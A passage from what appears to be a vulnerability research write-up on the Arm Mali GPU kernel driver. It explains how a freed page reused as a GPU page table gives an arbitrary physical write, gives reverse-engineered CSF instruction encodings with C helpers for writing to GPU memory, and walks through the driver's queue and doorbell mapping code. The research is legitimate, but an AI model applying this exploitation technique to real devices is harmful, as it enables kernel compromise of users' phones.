This simply takes the first page in the pool [1], so the page used for the PGD will be the one most
recently inserted into the <code class="language-plaintext highlighter-rouge">kbase_device</code> pool.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="nf">kbase_mem_pool_remove_locked</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_pool</span> <span class="o">*</span><span class="n">pool</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">p</span><span class="p">;</span>

	<span class="n">lockdep_assert_held</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pool</span><span class="o">-&gt;</span><span class="n">pool_lock</span><span class="p">);</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">kbase_mem_pool_is_empty</span><span class="p">(</span><span class="n">pool</span><span class="p">))</span>
		<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="n">p</span> <span class="o">=</span> <span class="n">list_first_entry</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pool</span><span class="o">-&gt;</span><span class="n">page_list</span><span class="p">,</span> <span class="k">struct</span> <span class="n">page</span><span class="p">,</span> <span class="n">lru</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="n">list_del_init</span><span class="p">(</span><span class="o">&amp;</span><span class="n">p</span><span class="o">-&gt;</span><span class="n">lru</span><span class="p">);</span>
	<span class="n">pool</span><span class="o">-&gt;</span><span class="n">cur_size</span><span class="o">--</span><span class="p">;</span>

	<span class="n">pool_dbg</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="s">"removed page</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="k">return</span> <span class="n">p</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>In the actual exploit, the allocation of 513 pages causes a level 2 PGD to be allocated first,
followed by a level 3 PGD. This means that the second physical page (freed page 1 above)
freed by <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> will be used for the level 2 PGD, while the first physical page (freed
page 0) will be used for the level 3 PGD. Since the alias region’s backing physical page (page 0)
is being reused as a level 3 PGD, we can perform a GPU write operation on the alias region to
overwrite any GPU ATE in that PGD. This essentially gives us an arbitrary write primitive to any
physical address.</p>
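
<p>The ordering argument in this section (pages freed as 0 then 1, handed back out as 1 then 0) can be checked with a toy re-implementation of the list operations involved. This is a sketch with hypothetical <code class="language-plaintext highlighter-rouge">toy_*</code> names that mirrors the behaviour of the kernel’s <code class="language-plaintext highlighter-rouge">list_add</code>, <code class="language-plaintext highlighter-rouge">list_splice</code> and <code class="language-plaintext highlighter-rouge">list_first_entry</code>. It is not the kernel code itself, and the single older page already sitting in the pool is an assumption made for illustration.</p>

```c
#include <stddef.h>

struct toy_list { struct toy_list *next, *prev; };

struct toy_page {
	struct toy_list lru; /* must stay the first member for the cast below */
	int id;
};

static void toy_list_init(struct toy_list *h) { h->next = h->prev = h; }

/* Insert entry right after head, like the kernel's list_add(). */
static void toy_list_add(struct toy_list *entry, struct toy_list *head)
{
	entry->next = head->next;
	entry->prev = head;
	head->next->prev = entry;
	head->next = entry;
}

/* Splice all of list onto the front of head, like list_splice(). */
static void toy_list_splice(struct toy_list *list, struct toy_list *head)
{
	if (list->next == list)
		return;
	list->next->prev = head;
	list->prev->next = head->next;
	head->next->prev = list->prev;
	head->next = list->next;
}

/* Pop the first entry, like list_first_entry() plus list_del_init(). */
static struct toy_page *toy_pool_remove(struct toy_list *head)
{
	struct toy_list *first = head->next;

	if (first == head)
		return NULL;
	first->prev->next = first->next;
	first->next->prev = first->prev;
	toy_list_init(first);
	return (struct toy_page *)first;
}

/*
 * Frees pages 0..nr-1 (at most 8) into a pool that already holds one
 * older page (id -1), then records the ids of the pages handed back out.
 */
void toy_free_then_alloc(int nr, int *out_ids)
{
	struct toy_page old = { .id = -1 };
	struct toy_page pages[8];
	struct toy_list pool, new_page_list;

	toy_list_init(&pool);
	toy_list_init(&new_page_list);
	toy_list_add(&old.lru, &pool);

	for (int i = 0; i < nr && i < 8; i++) { /* kbase_mem_pool_add_array */
		pages[i].id = i;
		toy_list_add(&pages[i].lru, &new_page_list);
	}
	toy_list_splice(&new_page_list, &pool); /* kbase_mem_pool_add_list_locked */

	for (int i = 0; i < nr && i < 8; i++)   /* kbase_mem_pool_alloc */
		out_ids[i] = toy_pool_remove(&pool)->id;
}
```

<p>With <code class="language-plaintext highlighter-rouge">nr</code> set to 2, the first page handed out is page 1 and the second is page 0, matching the level 2 and level 3 PGD assignment described above.</p>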

<h2 id="writing-to-gpu-memory-using-csf">Writing to GPU memory using CSF</h2>

<h3 id="gpu-instruction-streaming-mechanism">GPU instruction streaming mechanism</h3>

<blockquote>
  <p><strong>Note:</strong> The discussion that follows reflects the state of research as of late 2022 to early 2023</p>
</blockquote>

<p>Previous work (CVE-2022-28348/CVE-2022-20186) has shown that writing immediate values to
GPU memory is possible by packing GPU jobs and submitting them using the
<code class="language-plaintext highlighter-rouge">KBASE_IOCTL_JOB_SUBMIT</code> ioctl. This leveraged the <a href="https://gitlab.freedesktop.org/panfrost/pandecode-standalone">pandecode-standalone</a> tool by Alyssa
Rosenzweig. However, this job submission mechanism does not exist in CSF builds of the Mali
kernel driver, where queueing instructions into CSF queue ring buffers is the new way to perform
operations with the GPU. Arm has only rolled out CSF on GPUs released
since 2021, all of which use the latest Valhall architecture. Back then, an <a href="https://www.collabora.com/news-and-blog/news-and-events/reverse-engineering-the-mali-g78.html">instruction set reference</a>
released by Collabora for Valhall GPUs existed (it appears the PDF link is no longer freely accessible), so I initially experimented with forming
instructions based on it. However, the GPU complained that the instructions were invalid when using CSF, suggesting
that Valhall GPUs with CSF probably use a different instruction
set altogether. When looking for an updated instruction set for the newer CSF GPUs, I
discovered this <a href="https://gitlab.com/panfork">panfork repo</a> maintained by Icecream95, which is meant to bring CSF support for
Mali G610/G710 GPUs to the open source Panfrost user space Mali driver. Checking again in 2026, the <code class="language-plaintext highlighter-rouge">panfork</code> repository is now retired and redirects users to the upstream <a href="https://gitlab.freedesktop.org/mesa/mesa/-/tree/main/src/panfrost">panfrost repo</a>, as it now includes the support that the fork was intended to provide.</p>

<p>The current upstream <code class="language-plaintext highlighter-rouge">panfrost</code> repository now contains the instruction formats for CSF previously only found in <code class="language-plaintext highlighter-rouge">panfork</code>, and can be referenced for the proper GPU instruction formats. Decoded instruction formats can be found in
<a href="https://gitlab.freedesktop.org/mesa/mesa/-/blob/main/src/panfrost/genxml/v10.xml?ref_type=heads"><code class="language-plaintext highlighter-rouge">mesa/src/panfrost/genxml/v{10, 12, 13, 14}.xml</code></a> (e.g. <code class="language-plaintext highlighter-rouge">CS MOVE48</code>, <code class="language-plaintext highlighter-rouge">CS MOVE32</code>, <code class="language-plaintext highlighter-rouge">CS STORE_MULTIPLE</code>), with some decoding code in
<a href="https://gitlab.freedesktop.org/mesa/mesa/-/blob/main/src/panfrost/genxml/decode_csf.c?ref_type=heads"><code class="language-plaintext highlighter-rouge">mesa/src/panfrost/genxml/decode_csf.c</code></a>. Together, these are sufficient for figuring out how to perform a simple write of
an immediate value to GPU memory. Each GPU instruction is 64 bits long and most instructions operate
on GPU registers, which are 32 bits wide. When experimenting with the instructions, I
found that I could write to registers 0 to 95, but I’m not entirely clear how many registers are
valid for use in this architecture version. We can write a 48-bit or 32-bit
immediate value into a register with a single instruction, and a 48-bit value is sufficient to
represent a GPU virtual address (i.e. GPU VA) returned by <code class="language-plaintext highlighter-rouge">mmap</code> for GPU VA regions. Physical addresses
should be representable by 32-bit values, depending on the memory layout of the device.</p>

<p>An immediate value can be written to a GPU VA by:</p>

<ol>
  <li>Writing the destination address to registers using the 48-bit <code class="language-plaintext highlighter-rouge">MOV</code> instruction</li>
  <li>Writing the immediate value to some other registers using a series of 32-bit <code class="language-plaintext highlighter-rouge">MOV</code>
instructions, depending on the size of the immediate value to write</li>
  <li>Storing the immediate value to the destination address using a <code class="language-plaintext highlighter-rouge">STR</code> instruction</li>
</ol>

<p><code class="language-plaintext highlighter-rouge">48-bit MOV instruction syntax</code>:</p>

<table>
  <thead>
    <tr>
      <th>Bits</th>
      <th>Field</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>56:63</td>
      <td>opcode (0x1)</td>
    </tr>
    <tr>
      <td>48:55</td>
      <td>destination register</td>
    </tr>
    <tr>
      <td>0:47</td>
      <td>48-bit immediate value</td>
    </tr>
  </tbody>
</table>

<blockquote>
  <p><strong>Caveat:</strong> The destination register must be an even numbered register, probably to allow the
hardware to use 64-bit data paths without handling unaligned access.</p>
</blockquote>

<p>When executing this instruction, what actually happens is that the lowest 32 bits of the
immediate value are placed into the destination register, and the remaining 16 bits are placed
starting at bit 0 in the subsequent register. For instance, writing to destination register 2 will write
the bottom 32 bits to register 2 and the higher 16 bits to register 3.</p>

<p><code class="language-plaintext highlighter-rouge">32-bit MOV instruction syntax</code>:</p>

<table>
  <thead>
    <tr>
      <th>Bits</th>
      <th>Field</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>56:63</td>
      <td>opcode (0x2)</td>
    </tr>
    <tr>
      <td>48:55</td>
      <td>destination register</td>
    </tr>
    <tr>
      <td>32:47</td>
      <td>unknown</td>
    </tr>
    <tr>
      <td>0:31</td>
      <td>32-bit immediate value</td>
    </tr>
  </tbody>
</table>

<p>This instruction is largely the same as the 48-bit variant, with the immediate value being written
just to the destination register.</p>

<p><code class="language-plaintext highlighter-rouge">STR instruction syntax</code>:</p>

<table>
  <thead>
    <tr>
      <th>Bits</th>
      <th>Field</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>56:63</td>
      <td>opcode (0x15)</td>
    </tr>
    <tr>
      <td>48:55</td>
      <td>first value register (holds first 32-bits to write)</td>
    </tr>
    <tr>
      <td>40:47</td>
      <td>destination reg (holds address to write to after adding offset)</td>
    </tr>
    <tr>
      <td>32:39</td>
      <td>unknown</td>
    </tr>
    <tr>
      <td>16:31</td>
      <td>value registers mask</td>
    </tr>
    <tr>
      <td>0:15</td>
      <td>offset (must be 4-aligned)</td>
    </tr>
  </tbody>
</table>

<p>The <code class="language-plaintext highlighter-rouge">STR</code> instruction stores the 32-bit values held in one or more value registers to consecutive memory locations,
starting at <code class="language-plaintext highlighter-rouge">((value in {destination register + 1}) &lt;&lt; 32 | value in
{destination register}) + offset</code>. In other words, the destination register holds the lower 32 bits of the address and the next register
(destination register + 1) holds the upper 32 bits. The value registers mask selects which registers are stored, counting from the
first value register: bit <em>n</em> of the mask selects register (first value register + <em>n</em>). Since the mask is 16 bits wide, a single
<code class="language-plaintext highlighter-rouge">STR</code> instruction can write up to sixteen 32-bit registers. For example, to write the values in registers 4, 6 and 8
sequentially to memory, we specify the first value register as 4 and provide a value registers
mask of 0b10101 (0x15). To write just the values of registers 4 and 5, we use a
mask of 0b11 (0x3).</p>
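<p>The register selection and address calculation described above can be sketched in C as follows. This is only a model of the behaviour I observed, not driver or firmware code: the helper names <code class="language-plaintext highlighter-rouge">str_value_registers</code> and <code class="language-plaintext highlighter-rouge">str_target_address</code> are made up for illustration, the register file is modelled as a plain array, and the offset is treated as unsigned, which is an assumption.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Expand a value registers mask into the list of register numbers it selects.
 * Bit n of the mask selects register (first + n). Returns the number of
 * registers written to regs[], which must have room for 16 entries.
 */
static size_t str_value_registers(uint8_t first, uint16_t mask, uint8_t regs[16])
{
	size_t n = 0;

	for (unsigned int bit = 0; bit < 16; bit++) {
		if (mask & (1u << bit))
			regs[n++] = (uint8_t)(first + bit);
	}
	return n;
}

/*
 * Compute the address a STR would write to, given a modelled register file.
 * regfile[addr_reg] holds the lower 32 bits and regfile[addr_reg + 1] the
 * upper bits. The offset is treated as unsigned here (an assumption).
 */
static uint64_t str_target_address(const uint32_t *regfile, uint8_t addr_reg,
				   uint16_t offset)
{
	uint64_t base = ((uint64_t)regfile[addr_reg + 1] << 32) | regfile[addr_reg];

	assert((offset & 3) == 0); /* offset must be 4-aligned */
	return base + offset;
}
```

<p>With a first value register of 4, a mask of 0x15 selects registers 4, 6 and 8, while a mask of 0x3 selects registers 4 and 5, matching the two cases described above.</p>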

<p>For example, to store a 64-bit value to a GPU VA, we can do the following:</p>

<ol>
  <li>Use a 48-bit <code class="language-plaintext highlighter-rouge">MOV</code> instruction to write a GPU VA to register 2</li>
  <li>Use two 32-bit <code class="language-plaintext highlighter-rouge">MOV</code> instructions to write to registers 4 and 5, writing the lower 32 bits of the value to
register 4 and the upper 32 bits to register 5</li>
  <li>Use the <code class="language-plaintext highlighter-rouge">STR</code> instruction to store the 64-bit value at the GPU VA. The first value register
will be 4, destination register will be 2, value registers mask will be 3 (0b11) and offset will be 0.
This takes the values at register 4 and 5 and writes them at the GPU VA stored in register 2.</li>
</ol>

<p>This example instruction sequence will be encoded as</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x1 &lt;&lt; 56 | 2 &lt;&lt; 48 | (gpu_va &amp; 0xFFFFFFFFFFFF) &lt;-- 48-bit MOV, stores GPU VA in register 2
0x2 &lt;&lt; 56 | 4 &lt;&lt; 48 | (value &amp; 0xFFFFFFFF) &lt;-- 32-bit MOV, stores lower 32-bits of value to register 4
0x2 &lt;&lt; 56 | 5 &lt;&lt; 48 | (value &gt;&gt; 32) &lt;-- 32-bit MOV, stores upper 32-bits of value to register 5
0x15 &lt;&lt; 56 | 4 &lt;&lt; 48 | 2 &lt;&lt; 40 | 3 &lt;&lt; 16 &lt;-- STR, stores value to GPU VA
</code></pre></div></div>
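<p>For reference, the same encoding can be written as a few small C helpers. This is a minimal sketch based only on the field layouts in the tables above; the function and macro names (<code class="language-plaintext highlighter-rouge">cs_mov48</code>, <code class="language-plaintext highlighter-rouge">cs_mov32</code>, <code class="language-plaintext highlighter-rouge">cs_str</code>, <code class="language-plaintext highlighter-rouge">cs_emit_store64</code>) are my own and do not come from the driver or from Mesa, and the fields marked unknown are simply left as zero.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Opcodes as listed in the instruction tables above. */
#define CS_OP_MOV48 0x01u
#define CS_OP_MOV32 0x02u
#define CS_OP_STR   0x15u

/* 48-bit MOV: opcode [63:56], destination register [55:48], immediate [47:0]. */
static uint64_t cs_mov48(uint8_t dst, uint64_t imm48)
{
	assert((dst & 1) == 0); /* destination must be an even-numbered register */
	return ((uint64_t)CS_OP_MOV48 << 56) | ((uint64_t)dst << 48) |
	       (imm48 & 0xFFFFFFFFFFFFull);
}

/* 32-bit MOV: opcode [63:56], destination register [55:48], immediate [31:0]. */
static uint64_t cs_mov32(uint8_t dst, uint32_t imm32)
{
	return ((uint64_t)CS_OP_MOV32 << 56) | ((uint64_t)dst << 48) | imm32;
}

/* STR: opcode, first value register, address register, mask [31:16], offset [15:0]. */
static uint64_t cs_str(uint8_t first_val, uint8_t addr_reg, uint16_t mask,
		       uint16_t offset)
{
	assert((offset & 3) == 0); /* offset must be 4-aligned */
	return ((uint64_t)CS_OP_STR << 56) | ((uint64_t)first_val << 48) |
	       ((uint64_t)addr_reg << 40) | ((uint64_t)mask << 16) | offset;
}

/*
 * Emit the four-instruction sequence from the example: GPU VA in registers
 * 2/3, value in registers 4/5, then a STR of both value registers.
 * Returns the number of 64-bit instructions written to out[].
 */
static size_t cs_emit_store64(uint64_t *out, uint64_t gpu_va, uint64_t value)
{
	out[0] = cs_mov48(2, gpu_va);
	out[1] = cs_mov32(4, (uint32_t)value);
	out[2] = cs_mov32(5, (uint32_t)(value >> 32));
	out[3] = cs_str(4, 2, 0x3, 0);
	return 4;
}
```

<p>The resulting four 64-bit words can then be copied into the queue’s ring buffer. The explicit <code class="language-plaintext highlighter-rouge">uint64_t</code> casts matter in C, since shifting a plain <code class="language-plaintext highlighter-rouge">int</code> by 48 or 56 bits is undefined.</p>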

<h3 id="executing-instructions">Executing instructions</h3>

<p>To actually get the GPU to process instructions in a queue’s ring buffer, each CSF queue
requires a set of three special pages to be mapped that give the user control over GPU execution of
instructions in the ring buffer. The three pages are a hardware doorbell page, an input page and
an output page. A CSF queue has to be bound to a command stream group (CSG) in order to
be scheduled by the CSF scheduler, which schedules one group of command streams at a time.
A command stream is just an abstraction that encapsulates the state of a queue and provides
an interface for the CSF firmware to interact with. A CSF group can be created with the ioctl
<code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_GROUP_CREATE</code> and a queue can be bound to a group using the ioctl
<code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_BIND</code>. In <code class="language-plaintext highlighter-rouge">kbase_csf_queue_bind</code>, the queue is added to the
<code class="language-plaintext highlighter-rouge">bound_queues</code> array of the group and the ioctl returns a <code class="language-plaintext highlighter-rouge">mmap</code> handle for mapping the
hardware doorbell page and input/output pages.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_csf_queue_bind</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="k">union</span> <span class="n">kbase_ioctl_cs_queue_bind</span> <span class="o">*</span><span class="n">bind</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">ret</span> <span class="o">=</span> <span class="n">get_user_pages_mmap_handle</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">queue</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="n">bind</span><span class="o">-&gt;</span><span class="n">out</span><span class="p">.</span><span class="n">mmap_handle</span> <span class="o">=</span> <span class="n">queue</span><span class="o">-&gt;</span><span class="n">handle</span><span class="p">;</span>
	<span class="n">group</span><span class="o">-&gt;</span><span class="n">bound_queues</span><span class="p">[</span><span class="n">bind</span><span class="o">-&gt;</span><span class="n">in</span><span class="p">.</span><span class="n">csi_index</span><span class="p">]</span> <span class="o">=</span> <span class="n">queue</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">group</span> <span class="o">=</span> <span class="n">group</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">csi_index</span> <span class="o">=</span> <span class="n">bind</span><span class="o">-&gt;</span><span class="n">in</span><span class="p">.</span><span class="n">csi_index</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">bind_state</span> <span class="o">=</span> <span class="n">KBASE_CSF_QUEUE_BIND_IN_PROGRESS</span><span class="p">;</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* Reserve a cookie, to be returned as a handle to userspace for creating
 * the CPU mapping of the pair of input/output pages and Hw doorbell page.
 * Will return 0 in case of success otherwise negative on failure.
 */</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">get_user_pages_mmap_handle</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="n">queue</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="cm">/* relocate to correct base */</span>
	<span class="n">cookie</span> <span class="o">=</span> <span class="n">cookie_nr</span> <span class="o">+</span> <span class="n">PFN_DOWN</span><span class="p">(</span><span class="n">BASEP_MEM_CSF_USER_IO_PAGES_HANDLE</span><span class="p">);</span>
	<span class="n">cookie</span> <span class="o">&lt;&lt;=</span> <span class="n">PAGE_SHIFT</span><span class="p">;</span>

	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">handle</span> <span class="o">=</span> <span class="p">(</span><span class="n">u64</span><span class="p">)</span><span class="n">cookie</span><span class="p">;</span>

	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
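<p>The handle calculation amounts to offsetting the cookie number by a fixed base page number and converting the result back into a byte offset. A small sketch of that arithmetic is shown below. The page shift of 12 and the base value used here are assumptions for illustration only and should be checked against the headers of the driver version in use; <code class="language-plaintext highlighter-rouge">user_io_pages_handle</code> is a made-up name.</p>

```c
#include <assert.h>
#include <stdint.h>

/* Assumed values, for illustration only. */
#define EXAMPLE_PAGE_SHIFT 12u
#define EXAMPLE_USER_IO_PAGES_HANDLE ((uint64_t)48 << EXAMPLE_PAGE_SHIFT)

/*
 * Mirror of the cookie relocation: add the base page frame number to the
 * cookie number, then shift back up to get a page-aligned handle.
 */
static uint64_t user_io_pages_handle(uint64_t cookie_nr)
{
	uint64_t cookie = cookie_nr +
			  (EXAMPLE_USER_IO_PAGES_HANDLE >> EXAMPLE_PAGE_SHIFT);
	uint64_t handle = cookie << EXAMPLE_PAGE_SHIFT;

	/* The handle is page aligned, so it can be used as an mmap offset. */
	assert((handle & ((1u << EXAMPLE_PAGE_SHIFT) - 1)) == 0);
	return handle;
}
```

<p>Userspace passes the returned handle as the offset argument of <code class="language-plaintext highlighter-rouge">mmap</code> on the Mali device file descriptor to create the mapping for the three user IO pages.</p>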

<p>When the returned cookie is used to mmap the user IO pages, the driver uses
<code class="language-plaintext highlighter-rouge">kbase_csf_cpu_mmap_user_io_pages</code> to perform some allocations and set up the virtual
memory area (VMA) for the region. It does not yet map the hardware doorbell page or the
input/output pages into the VMA; these are only mapped on page fault.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">kbase_csf_cpu_mmap_user_io_pages</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		 <span class="k">struct</span> <span class="n">vm_area_struct</span> <span class="o">*</span><span class="n">vma</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
	<span class="n">err</span> <span class="o">=</span> <span class="n">kbase_csf_alloc_command_stream_user_pages</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">queue</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span>
		<span class="k">goto</span> <span class="n">map_failed</span><span class="p">;</span>
	<span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_flags</span> <span class="o">|=</span> <span class="n">VM_DONTCOPY</span> <span class="o">|</span> <span class="n">VM_DONTDUMP</span> <span class="o">|</span> <span class="n">VM_DONTEXPAND</span> <span class="o">|</span> <span class="n">VM_IO</span><span class="p">;</span>
	<span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_flags</span> <span class="o">|=</span> <span class="n">VM_PFNMAP</span><span class="p">;</span>
	<span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_ops</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">kbase_csf_user_io_pages_vm_ops</span><span class="p">;</span>
	<span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_private_data</span> <span class="o">=</span> <span class="n">queue</span><span class="p">;</span>
 <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">kbase_csf_user_io_pages_vm_ops</code> is assigned as the vm_ops of the user IO pages VMA and
page faults are handled with <code class="language-plaintext highlighter-rouge">kbase_csf_user_io_pages_vm_fault</code> [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">vm_operations_struct</span> <span class="n">kbase_csf_user_io_pages_vm_ops</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">.</span><span class="n">open</span> <span class="o">=</span> <span class="n">kbase_csf_user_io_pages_vm_open</span><span class="p">,</span>
	<span class="p">.</span><span class="n">close</span> <span class="o">=</span> <span class="n">kbase_csf_user_io_pages_vm_close</span><span class="p">,</span>
	<span class="p">.</span><span class="n">fault</span> <span class="o">=</span> <span class="n">kbase_csf_user_io_pages_vm_fault</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="p">};</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">vm_fault_t</span> <span class="nf">kbase_csf_user_io_pages_vm_fault</span><span class="p">(</span><span class="k">struct</span> <span class="n">vm_fault</span> <span class="o">*</span><span class="n">vmf</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">vm_area_struct</span> <span class="o">*</span><span class="n">vma</span> <span class="o">=</span> <span class="n">vmf</span><span class="o">-&gt;</span><span class="n">vma</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="n">queue</span> <span class="o">=</span> <span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_private_data</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">doorbell_cpu_addr</span> <span class="o">=</span> <span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_start</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">vmf</span><span class="o">-&gt;</span><span class="n">address</span> <span class="o">==</span> <span class="n">doorbell_cpu_addr</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">doorbell_page_pfn</span> <span class="o">=</span> <span class="n">get_queue_doorbell_pfn</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span> <span class="n">queue</span><span class="p">);</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="n">mgm_dev</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">.</span><span class="n">mgm_vmf_insert_pfn_prot</span><span class="p">(</span><span class="n">mgm_dev</span><span class="p">,</span>
			<span class="n">KBASE_MEM_GROUP_CSF_IO</span><span class="p">,</span> <span class="n">vma</span><span class="p">,</span> <span class="n">doorbell_cpu_addr</span><span class="p">,</span>
			<span class="n">doorbell_page_pfn</span><span class="p">,</span> <span class="n">doorbell_pgprot</span><span class="p">);</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="cm">/* Map the Input page */</span>
		<span class="n">input_cpu_addr</span> <span class="o">=</span> <span class="n">doorbell_cpu_addr</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
		<span class="n">input_page_pfn</span> <span class="o">=</span> <span class="n">PFN_DOWN</span><span class="p">(</span><span class="n">as_phys_addr_t</span><span class="p">(</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">phys</span><span class="p">[</span><span class="mi">0</span><span class="p">]));</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="n">mgm_dev</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">.</span><span class="n">mgm_vmf_insert_pfn_prot</span><span class="p">(</span><span class="n">mgm_dev</span><span class="p">,</span>
			<span class="n">KBASE_MEM_GROUP_CSF_IO</span><span class="p">,</span> <span class="n">vma</span><span class="p">,</span> <span class="n">input_cpu_addr</span><span class="p">,</span>
			<span class="n">input_page_pfn</span><span class="p">,</span>
			<span class="n">input_page_pgprot</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">!=</span> <span class="n">VM_FAULT_NOPAGE</span><span class="p">)</span>
			<span class="k">goto</span> <span class="n">exit</span><span class="p">;</span>

		<span class="cm">/* Map the Output page */</span>
		<span class="n">output_cpu_addr</span> <span class="o">=</span> <span class="n">input_cpu_addr</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
		<span class="n">output_page_pfn</span> <span class="o">=</span> <span class="n">PFN_DOWN</span><span class="p">(</span><span class="n">as_phys_addr_t</span><span class="p">(</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">phys</span><span class="p">[</span><span class="mi">1</span><span class="p">]));</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="n">mgm_dev</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">.</span><span class="n">mgm_vmf_insert_pfn_prot</span><span class="p">(</span><span class="n">mgm_dev</span><span class="p">,</span>
			<span class="n">KBASE_MEM_GROUP_CSF_IO</span><span class="p">,</span> <span class="n">vma</span><span class="p">,</span> <span class="n">output_cpu_addr</span><span class="p">,</span>
			<span class="n">output_page_pfn</span><span class="p">,</span> <span class="n">output_page_pgprot</span><span class="p">);</span>
	<span class="p">}</span>
      <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">get_queue_doorbell_pfn</code> only returns the real hardware doorbell page if the command stream
associated with the queue has already been scheduled. When scheduling a command stream,
the scheduler invokes <code class="language-plaintext highlighter-rouge">program_cs</code> which programs the associated queue’s state and data into
a shared page with the CSF firmware, assigns a user doorbell to the queue, and rings the kernel
doorbell for the command stream to notify the GPU of a new stream ready for execution.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">program_cs</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_queue</span> <span class="o">*</span><span class="n">queue</span><span class="p">,</span> <span class="n">bool</span> <span class="n">ring_csg_doorbell</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">assign_user_doorbell_to_queue</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span> <span class="n">queue</span><span class="p">);</span>
